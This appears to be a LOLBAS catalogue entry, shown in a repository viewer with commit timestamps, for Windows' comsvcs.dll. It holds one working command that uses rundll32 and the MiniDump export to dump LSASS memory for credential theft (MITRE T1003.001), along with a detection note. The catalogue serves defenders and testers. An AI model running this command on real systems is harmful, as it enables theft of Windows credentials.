LOLBAS/yml/OSLibraries/comsvcs.yml

26 lines
810 B
YAML
Raw Normal View History

---
Name: Comsvcs.dll
Description: COM+ Services
Author:
Created: 2019-08-30
Commands:
- Command: rundll32 C:\windows\system32\comsvcs.dll MiniDump "[LSASS_PID] dump.bin full"
Description: Calls the MiniDump exported function of comsvcs.dll, which in turns calls MiniDumpWriteDump.
Usecase: Dump Lsass.exe process memory to retrieve credentials.
Category: Dump
Privileges: SYSTEM
2021-11-05 21:35:58 +01:00
MitreID: T1003.001
OperatingSystem: Windows
Full_Path:
- Path: c:\windows\system32\comsvcs.dll
Code_Sample:
- Code: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
Detection:
2019-09-16 09:38:05 +02:00
- IOC: MiniDump being used in library
Resources:
- Link: https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/
2019-09-17 20:45:49 +02:00
Acknowledgement:
2019-09-16 09:50:01 +02:00
- Person: modexp
Handle:
---